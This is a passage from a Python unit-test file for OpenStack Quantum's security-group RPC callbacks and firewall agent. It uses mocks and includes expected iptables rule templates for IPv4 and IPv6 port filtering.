self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv6_egress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group()) as (subnet_v6,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'egress', 'tcp', '22',
'22',
ethertype='IPv6')
rule2 = self._build_security_group_rule(
sg1_id,
'egress', 'udp', '23',
'23', fake_prefix,
ethertype='IPv6')
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'egress',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'egress', 'protocol': 'udp',
'ethertype': 'IPv6',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'dest_ip_prefix': fake_prefix},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv6_source_group(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group(),
self.security_group()) as (subnet_v6,
sg1,
sg2):
sg1_id = sg1['security_group']['id']
sg2_id = sg2['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '24',
'25',
ethertype='IPv6',
source_group_id=sg2['security_group']['id'])
rules = {
'security_group_rules': [rule1['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id,
sg2_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
res2 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg2_id])
ports_rest2 = self.deserialize(self.fmt, res2)
port_id2 = ports_rest2['port']['id']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'source_ip_prefix': 'fe80::3/128',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 25, 'port_range_min': 24,
'source_group_id': sg2_id,
'security_group_id': sg1_id},
{'ethertype': 'IPv6', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
self._delete('ports', port_id2)
class SGServerRpcCallBackMixinTestCaseXML(SGServerRpcCallBackMixinTestCase):
fmt = 'xml'
class SGAgentRpcCallBackMixinTestCase(unittest.TestCase):
def setUp(self):
self.rpc = sg_rpc.SecurityGroupAgentRpcCallbackMixin()
self.rpc.sg_agent = mock.Mock()
def test_security_groups_rule_updated(self):
self.rpc.security_groups_rule_updated(None,
security_groups=['fake_sgid'])
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_rule_updated(['fake_sgid'])])
def test_security_groups_member_updated(self):
self.rpc.security_groups_member_updated(None,
security_groups=['fake_sgid'])
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_member_updated(['fake_sgid'])])
def test_security_groups_provider_updated(self):
self.rpc.security_groups_provider_updated(None)
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_provider_updated()])
class SecurityGroupAgentRpcTestCase(unittest.TestCase):
def setUp(self):
self.agent = sg_rpc.SecurityGroupAgentRpcMixin()
self.agent.context = None
self.addCleanup(mock.patch.stopall)
mock.patch('quantum.agent.linux.iptables_manager').start()
self.agent.root_helper = 'sudo'
self.agent.init_firewall()
self.firewall = mock.Mock()
firewall_object = firewall_base.FirewallDriver()
self.firewall.defer_apply.side_effect = firewall_object.defer_apply
self.agent.firewall = self.firewall
rpc = mock.Mock()
self.agent.plugin_rpc = rpc
self.fake_device = {'device': 'fake_device',
'security_groups': ['fake_sgid1', 'fake_sgid2'],
'security_group_source_groups': ['fake_sgid2'],
'security_group_rules': [{'security_group_id':
'fake_sgid1',
'source_group_id':
'fake_sgid2'}]}
fake_devices = {'fake_device': self.fake_device}
self.firewall.ports = fake_devices
rpc.security_group_rules_for_devices.return_value = fake_devices
def test_prepare_and_remove_devices_filter(self):
self.agent.prepare_devices_filter(['fake_device'])
self.agent.remove_devices_filter(['fake_device'])
        # ignore devices which are not filtered
self.firewall.assert_has_calls([call.defer_apply(),
call.prepare_port_filter(
self.fake_device),
call.defer_apply(),
call.remove_port_filter(
self.fake_device),
])
def test_security_groups_rule_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_rule_updated(['fake_sgid1', 'fake_sgid3'])
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_security_groups_rule_not_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_rule_updated(['fake_sgid3', 'fake_sgid4'])
self.agent.refresh_firewall.assert_has_calls([])
def test_security_groups_member_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_member_updated(['fake_sgid2', 'fake_sgid3'])
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_security_groups_member_not_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_member_updated(['fake_sgid3', 'fake_sgid4'])
self.agent.refresh_firewall.assert_has_calls([])
def test_security_groups_provider_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.security_groups_provider_updated()
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_refresh_firewall(self):
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.refresh_firewall()
calls = [call.defer_apply(),
call.prepare_port_filter(self.fake_device),
call.defer_apply(),
call.update_port_filter(self.fake_device)]
self.firewall.assert_has_calls(calls)
class FakeSGRpcApi(agent_rpc.PluginApi,
sg_rpc.SecurityGroupServerRpcApiMixin):
pass
class SecurityGroupServerRpcApiTestCase(unittest.TestCase):
def setUp(self):
self.rpc = FakeSGRpcApi('fake_topic')
self.rpc.call = mock.Mock()
def test_security_group_rules_for_devices(self):
self.rpc.security_group_rules_for_devices(None, ['fake_device'])
self.rpc.call.assert_has_calls(
[call(None,
{'args':
{'devices': ['fake_device']},
'method':
'security_group_rules_for_devices'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake_topic')])
class FakeSGNotifierAPI(proxy.RpcProxy,
sg_rpc.SecurityGroupAgentRpcApiMixin):
pass
class SecurityGroupAgentRpcApiTestCase(unittest.TestCase):
def setUp(self):
self.notifier = FakeSGNotifierAPI(topic='fake',
default_version='1.0')
self.notifier.fanout_cast = mock.Mock()
def test_security_groups_rule_updated(self):
self.notifier.security_groups_rule_updated(
None, security_groups=['fake_sgid'])
self.notifier.fanout_cast.assert_has_calls(
[call(None,
{'args':
{'security_groups': ['fake_sgid']},
'method': 'security_groups_rule_updated'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake-security_group-update')])
def test_security_groups_member_updated(self):
self.notifier.security_groups_member_updated(
None, security_groups=['fake_sgid'])
self.notifier.fanout_cast.assert_has_calls(
[call(None,
{'args':
{'security_groups': ['fake_sgid']},
'method': 'security_groups_member_updated'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake-security_group-update')])
def test_security_groups_rule_not_updated(self):
self.notifier.security_groups_rule_updated(
None, security_groups=[])
self.assertEquals(False, self.notifier.fanout_cast.called)
def test_security_groups_member_not_updated(self):
self.notifier.security_groups_member_updated(
None, security_groups=[])
self.assertEquals(False, self.notifier.fanout_cast.called)
#Note(nati) bn -> binary_name
# id -> device_id
PHYSDEV_RULE = '-m physdev --physdev-is-bridged'
IPTABLES_ARG = {'bn': iptables_manager.binary_name,
'physdev': PHYSDEV_RULE}
CHAINS_NAT = 'OUTPUT|POSTROUTING|PREROUTING|float-snat|snat'
IPTABLES_ARG['chains'] = CHAINS_NAT
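# Descriptive note (assumed intent): the "(%(chains)s)" alternation in the
# templates below lets each chain-declaration line match any chain name once
# the template is wrapped in mox.Regex by _regex(), keeping the expectations
# insensitive to the order in which iptables-save lists the chains.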
IPTABLES_NAT = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-postrouting-bottom - [0:0]
-A PREROUTING -j %(bn)s-PREROUTING
-A OUTPUT -j %(bn)s-OUTPUT
-A POSTROUTING -j %(bn)s-POSTROUTING
-A POSTROUTING -j quantum-postrouting-bottom
-A quantum-postrouting-bottom -j %(bn)s-snat
-A %(bn)s-snat -j %(bn)s-float-snat
""" % IPTABLES_ARG
CHAINS_EMPTY = 'FORWARD|INPUT|OUTPUT|local|sg-chain|sg-fallback'
CHAINS_1 = CHAINS_EMPTY + '|i_port1|o_port1'
CHAINS_2 = CHAINS_1 + '|i_port2|o_port2'
IPTABLES_ARG['chains'] = CHAINS_1
IPTABLES_FILTER_1 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_1_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_2
IPTABLES_FILTER_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_2_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_2_3 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j RETURN -p icmp
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j RETURN -p icmp
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_EMPTY
IPTABLES_FILTER_EMPTY = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_1
IPTABLES_FILTER_V6_1 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p icmpv6 -j RETURN
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_2
IPTABLES_FILTER_V6_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
